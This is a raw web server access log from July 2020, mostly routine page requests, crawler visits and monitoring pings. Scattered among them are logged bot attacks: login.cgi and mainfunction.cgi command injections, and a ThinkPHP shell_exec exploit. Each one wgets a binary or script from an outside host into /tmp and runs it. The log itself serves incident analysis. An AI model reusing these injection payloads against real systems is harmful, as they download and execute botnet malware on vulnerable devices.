46.118.124.235 - - [05/Jul/2020:04:12:20 +0200] "GET / HTTP/1.1" 200 1229 "https://pansionat-kyiv.com.ua/" "Mozilla/4.0 (compatible; MSIE 6.0; Update a; AOL 6.0; Windows 98)"
46.118.124.235 - - [05/Jul/2020:04:12:21 +0200] "GET / HTTP/1.1" 200 1229 "https://pansionat-kyiv.com.ua/" "Mozilla/4.0 (compatible; MSIE 6.0; Update a; AOL 6.0; Windows 98)"
111.91.64.105 - - [05/Jul/2020:04:16:31 +0200] "GET /admin/login.asp HTTP/1.1" 400 329 "-" "-"
217.147.25.170 - - [05/Jul/2020:04:21:31 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.31/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
61.216.103.189 - - [05/Jul/2020:04:21:38 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
42.115.32.208 - - [05/Jul/2020:04:25:35 +0200] "GET /admin/login.asp HTTP/1.1" 400 329 "-" "-"
183.136.225.56 - - [05/Jul/2020:04:30:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
183.136.225.56 - - [05/Jul/2020:04:33:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
45.143.220.79 - - [05/Jul/2020:04:40:35 +0200] "GET / HTTP/1.1" 200 1229 "http://212.91.246.83:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
172.104.108.109 - - [05/Jul/2020:04:42:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
209.141.51.147 - - [05/Jul/2020:04:46:24 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://209.141.37.101/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
220.134.92.138 - - [05/Jul/2020:04:47:32 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
188.242.7.1 - - [05/Jul/2020:04:52:21 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://45.95.168.126/d%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 329 "-" "Rift/2.0"
185.202.2.147 - - [05/Jul/2020:04:55:37 +0200] "\x03" 501 316 "-" "-"
185.202.2.147 - - [05/Jul/2020:04:55:54 +0200] "\x03" 501 316 "-" "-"
185.202.2.147 - - [05/Jul/2020:04:56:03 +0200] "\x03" 501 316 "-" "-"
185.202.2.147 - - [05/Jul/2020:04:56:12 +0200] "\x03" 501 316 "-" "-"
183.136.225.56 - - [05/Jul/2020:04:57:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
49.158.198.210 - - [05/Jul/2020:05:00:58 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
58.71.198.38 - - [05/Jul/2020:05:10:20 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
220.135.232.111 - - [05/Jul/2020:05:15:43 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
183.136.225.56 - - [05/Jul/2020:05:16:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
45.143.220.79 - - [05/Jul/2020:05:16:42 +0200] "GET / HTTP/1.1" 200 1229 "http://212.91.246.84:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
192.35.168.204 - - [05/Jul/2020:05:17:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
192.35.168.204 - - [05/Jul/2020:05:17:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
209.141.60.207 - - [05/Jul/2020:05:17:38 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://209.141.37.101/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
178.193.186.110 - - [05/Jul/2020:05:18:58 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
47.57.27.42 - - [05/Jul/2020:05:19:19 +0200] "GET /xmlrpc.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
193.118.53.194 - - [05/Jul/2020:05:21:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
220.134.174.99 - - [05/Jul/2020:05:22:45 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
185.202.2.147 - - [05/Jul/2020:05:23:43 +0200] "\x03" 501 316 "-" "-"
117.251.64.185 - - [05/Jul/2020:05:25:48 +0200] "GET /admin/login.asp HTTP/1.1" 400 329 "-" "-"
103.105.44.23 - - [05/Jul/2020:05:30:34 +0200] "GET /admin/login.asp HTTP/1.1" 400 329 "-" "-"
191.17.106.44 - - [05/Jul/2020:05:32:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
191.17.106.44 - - [05/Jul/2020:05:32:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
103.102.101.173 - - [05/Jul/2020:05:36:41 +0200] "GET /admin/login.asp HTTP/1.1" 400 329 "-" "-"
115.96.126.204 - - [05/Jul/2020:05:37:51 +0200] "GET /admin/login.asp HTTP/1.1" 400 329 "-" "-"
45.201.135.85 - - [05/Jul/2020:05:40:30 +0200] "GET /admin/login.asp HTTP/1.1" 400 329 "-" "-"
220.132.4.13 - - [05/Jul/2020:05:41:50 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
171.235.208.187 - - [05/Jul/2020:05:42:29 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
114.34.100.5 - - [05/Jul/2020:05:44:47 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
45.143.220.79 - - [05/Jul/2020:05:46:08 +0200] "GET / HTTP/1.1" 200 1229 "http://212.91.246.89:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
45.143.220.79 - - [05/Jul/2020:05:47:38 +0200] "GET / HTTP/1.1" 200 1229 "http://212.91.246.82:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
95.83.24.7 - - [05/Jul/2020:05:48:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
45.143.220.79 - - [05/Jul/2020:05:49:25 +0200] "GET / HTTP/1.1" 200 1229 "http://212.91.246.81:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
114.35.217.235 - - [05/Jul/2020:05:50:36 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
185.202.2.147 - - [05/Jul/2020:05:57:52 +0200] "\x03" 501 316 "-" "-"
185.202.2.147 - - [05/Jul/2020:05:57:54 +0200] "\x03" 501 316 "-" "-"
185.202.2.147 - - [05/Jul/2020:05:57:59 +0200] "\x03" 501 316 "-" "-"
185.202.2.147 - - [05/Jul/2020:05:58:15 +0200] "\x03" 501 316 "-" "-"
185.202.2.147 - - [05/Jul/2020:05:58:29 +0200] "\x03" 501 316 "-" "-"
1.34.10.133 - - [05/Jul/2020:06:03:58 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
183.136.225.56 - - [05/Jul/2020:06:06:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
207.46.13.221 - - [05/Jul/2020:06:06:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
183.136.225.56 - - [05/Jul/2020:06:10:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
183.136.225.56 - - [05/Jul/2020:06:11:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
75.148.156.244 - - [05/Jul/2020:06:16:18 +0200] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://192.3.45.185/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a HTTP/1.1" 400 329 "-" "-"
202.43.114.124 - - [05/Jul/2020:06:18:38 +0200] "\x16\x03\x01" 501 318 "-" "-"
202.43.114.124 - - [05/Jul/2020:06:18:38 +0200] "\x16\x03\x01" 501 318 "-" "-"
202.43.114.124 - - [05/Jul/2020:06:18:38 +0200] "\x16\x03\x01" 501 318 "-" "-"
202.43.114.124 - - [05/Jul/2020:06:18:38 +0200] "\x16\x03\x01" 501 318 "-" "-"
202.43.114.124 - - [05/Jul/2020:06:18:38 +0200] "\x16\x03\x01" 501 318 "-" "-"
202.43.114.124 - - [05/Jul/2020:06:18:38 +0200] "\x16\x03\x01" 501 318 "-" "-"
202.43.114.124 - - [05/Jul/2020:06:18:38 +0200] "\x16\x03\x01" 501 318 "-" "-"
202.43.114.124 - - [05/Jul/2020:06:18:38 +0200] "\x16\x03\x01" 501 318 "-" "-"
202.43.114.124 - - [05/Jul/2020:06:18:38 +0200] "\x16\x03\x01" 501 318 "-" "-"
202.43.114.124 - - [05/Jul/2020:06:18:38 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.201.170.164 - - [05/Jul/2020:06:19:46 +0200] "GET /admin/login.asp HTTP/1.1" 400 329 "-" "-"
45.143.220.79 - - [05/Jul/2020:06:19:57 +0200] "GET / HTTP/1.1" 200 1229 "http://212.91.246.85:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
45.143.220.79 - - [05/Jul/2020:06:21:18 +0200] "GET / HTTP/1.1" 200 1229 "http://212.91.246.86:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
45.143.220.79 - - [05/Jul/2020:06:23:27 +0200] "GET / HTTP/1.1" 200 1229 "http://212.91.246.80:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
59.126.11.170 - - [05/Jul/2020:06:26:22 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
103.82.208.126 - - [05/Jul/2020:06:29:32 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://209.141.37.101/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
85.57.101.233 - - [05/Jul/2020:06:30:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
20.40.1.68 - - [05/Jul/2020:06:32:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
128.14.134.170 - - [05/Jul/2020:06:38:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
103.215.243.34 - - [05/Jul/2020:06:45:50 +0200] "GET /admin/login.asp HTTP/1.1" 400 329 "-" "-"
168.194.251.75 - - [05/Jul/2020:06:55:25 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.31/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
177.11.136.83 - - [05/Jul/2020:06:57:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [05/Jul/2020:07:00:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
103.41.147.148 - - [05/Jul/2020:07:00:34 +0200] "GET /admin/login.asp HTTP/1.1" 400 329 "-" "-"
80.82.70.140 - - [05/Jul/2020:07:01:14 +0200] "GET / HTTP/1.1" 200 1229 "http://212.91.246.88:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
212.91.246.72 - - [05/Jul/2020:07:01:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.82.70.140 - - [05/Jul/2020:07:02:18 +0200] "GET / HTTP/1.1" 200 1229 "http://212.91.246.82:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
212.91.246.72 - - [05/Jul/2020:07:02:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:07:03:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
209.141.60.207 - - [05/Jul/2020:07:03:25 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://209.141.37.101/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [05/Jul/2020:07:04:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:07:05:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:07:06:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:07:07:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.180.224.130 - - [05/Jul/2020:07:08:15 +0200] "GET ../../proc/ HTTP" 400 329 "-" "-"
167.114.209.28 - - [05/Jul/2020:07:08:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Dataprovider.com)"
167.114.209.28 - - [05/Jul/2020:07:08:18 +0200] "GET /robots.txt HTTP/1.1" 404 330 "-" "Mozilla/5.0 (compatible; Dataprovider.com)"
167.114.209.28 - - [05/Jul/2020:07:08:18 +0200] "GET /sitemap.xml HTTP/1.1" 404 331 "-" "Mozilla/5.0 (compatible; Dataprovider.com)"
167.114.209.28 - - [05/Jul/2020:07:08:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Dataprovider.com)"
167.114.209.28 - - [05/Jul/2020:07:08:19 +0200] "GET /ads.txt HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; Dataprovider.com)"
167.114.209.28 - - [05/Jul/2020:07:08:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; Android 5.1.1; SM-G925F Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.94 Mobile Safari/537.36"
212.91.246.72 - - [05/Jul/2020:07:08:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:07:09:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:07:10:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:07:11:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:07:12:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.82.70.140 - - [05/Jul/2020:07:12:22 +0200] "GET / HTTP/1.1" 200 1229 "http://212.91.246.81:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
114.226.23.172 - - [05/Jul/2020:07:12:40 +0200] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 319 "-" "Hello, World"
212.91.246.72 - - [05/Jul/2020:07:13:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
51.91.107.55 - - [05/Jul/2020:07:14:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Dataprovider.com)"
212.91.246.72 - - [05/Jul/2020:07:14:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:07:15:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.82.70.140 - - [05/Jul/2020:07:15:35 +0200] "GET / HTTP/1.1" 200 1229 "http://212.91.246.85:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
117.203.97.66 - - [05/Jul/2020:07:15:35 +0200] "GET /admin/login.asp HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [05/Jul/2020:07:16:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:07:17:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.240.60.8 - - [05/Jul/2020:07:17:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [05/Jul/2020:07:18:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:07:19:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
54.243.53.148 - - [05/Jul/2020:07:19:29 +0200] "GET /robots.txt HTTP/1.1" 404 330 "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36"
141.136.23.154 - - [05/Jul/2020:07:19:29 +0200] "GET / HTTP/1.1" 200 1229 "https://www.google.com/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36"
209.141.60.207 - - [05/Jul/2020:07:19:55 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://209.141.37.101/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [05/Jul/2020:07:20:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:07:21:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:07:22:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:07:23:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:07:24:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
188.216.82.24 - - [05/Jul/2020:07:25:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [05/Jul/2020:07:25:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:07:26:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.118.53.194 - - [05/Jul/2020:07:26:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.201.130.78 - - [05/Jul/2020:07:27:18 +0200] "GET /admin/login.asp HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [05/Jul/2020:07:27:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:07:28:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
85.204.214.158 - - [05/Jul/2020:07:28:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [05/Jul/2020:07:29:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
148.71.44.68 - - [05/Jul/2020:07:30:11 +0200] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://scan.casualaffinity.net/x05010/888fff999.x86 -O .d41 ; chmod 777 .d41 ; ./.d41 ThinkPHP.exploit' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [05/Jul/2020:07:30:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.82.70.140 - - [05/Jul/2020:07:30:28 +0200] "GET / HTTP/1.1" 200 1229 "http://212.91.246.84:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
212.91.246.72 - - [05/Jul/2020:07:31:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:07:32:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:07:33:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:07:34:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:07:35:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:07:36:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:07:37:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.82.70.140 - - [05/Jul/2020:07:37:56 +0200] "GET / HTTP/1.1" 200 1229 "http://212.91.246.80:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
212.91.246.72 - - [05/Jul/2020:07:38:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:07:39:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:07:40:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:07:41:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:07:42:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:07:43:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:07:44:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.82.70.140 - - [05/Jul/2020:07:45:19 +0200] "GET / HTTP/1.1" 200 1229 "http://212.91.246.87:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
212.91.246.72 - - [05/Jul/2020:07:45:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:07:46:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
178.130.152.5 - - [05/Jul/2020:07:47:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
178.130.152.5 - - [05/Jul/2020:07:47:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [05/Jul/2020:07:47:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:07:48:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:07:49:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
103.203.210.239 - - [05/Jul/2020:07:49:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
111.229.246.160 - - [05/Jul/2020:07:50:06 +0200] "GET /TP/public/index.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
111.229.246.160 - - [05/Jul/2020:07:50:07 +0200] "GET /TP/index.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
